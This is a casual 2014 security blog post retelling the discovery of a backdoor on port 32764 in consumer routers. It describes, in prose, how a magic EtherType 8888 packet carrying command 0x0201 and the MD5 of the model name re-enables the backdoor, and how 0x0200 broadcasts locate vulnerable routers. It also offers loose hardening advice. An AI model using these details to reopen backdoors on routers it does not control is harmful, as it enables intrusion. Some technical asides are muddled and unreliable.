The Router You Owe May Be Vulnerable, Story Of The Fixed Router Backdoor! - Hackatrick - Technology With Security

24 April 2014

The Router You Owe May Be Vulnerable, Story Of The Fixed Router Backdoor!

2013 was the year, French hacker Eloi Vanderbeken was enjoying his Christmas and decided to tweak some of the performance settings. Funny thing happened was that "He forgot his own password!", so hacking his way in seemed more fun than that of resetting the router. *Clup*Clup*Boom*
Long story short, Vanderbeken found his way in.

He found that a service listening on port 32764 that could be instructed, without authentication, to dump the router's configuration and username and password!

Luckily, for you that port was listening on the internal side and not the internet side or the WAN side! that means, this backdoor exists so as so it's only accessible to users who are already on your network i.e. on your subnetwork, but still it's a giant security hole, For example: You tell me "Hey Hrishi! mind if you do some performance upgrades on my laptop?" I sit, I become evil, and I get into your router and mess with the settings, including opening up the backdoor on the internet interface so they can get back in later! That's how dangerous it was!

So, Vanderbeken reported it. Backdoor Patched! WoooLaa! NOT so soon.! As the main purpose of the backdoor was to actually help the management software of the router which many of you can access by typing your router's IP address into the URL bar. Vanderbeken soon found that the backdoor was still there! but turned off by default.

He tweaked more and found a way to re enable the backdoor by sending the router a so-called "magic ethernet packet". Read about Ethernet II type packets here.

this is a ethernet type II frame that i snapped from wikipedia.

Going theory! If you don't know mac-address, google it and the CRC is for data error recovery.
EtherTypes are 0800 for an IPv4 packet, 86DD for an IPv6 packet, 0806 for ARP (address resolution protocol), and 0842 for Wake-on-LAN(the magic packet).

Vanderbeken's router also listened for Wake-on-LAN's on etherType 8888.  What he did was very simple and easy, but resulted in a boom! router was sent an 8888-type packet containing the number
0x0201 (command identifier also very important for Cisco routers for resets), and the MD5 checksum of the string DGN1000, corresponding to his router's model number, this is a great example of thinking out of the box!

That little trick made the dead backdoor alive again! and He also discovered that sending a broadcast messages of type 8888 packet with command number 0x0200 makes the router reply, allowing an attacker on a LAN to find any exploitable routers.

Now How To be safe?

You know what, you can never be safe. Really. If you are thinking that I too will send packets on 8888 and detect the magic packet and block it. totally wrong. Because it varies with different firmwares and hardware, and the MD5 checksum may also differ.  

See if your router supports  an open source firmware such as DD-WRT or OpenWRT, They are great! These are linux based, and so many kind developers around the world are always ready to give you some hand. with patches form guy of 16 to a old master. 

So, go on tweak it, find something, use security measures. Don't worry, I won't drop on you. ;)

Any Suggestion/Question? Sure! on the comments!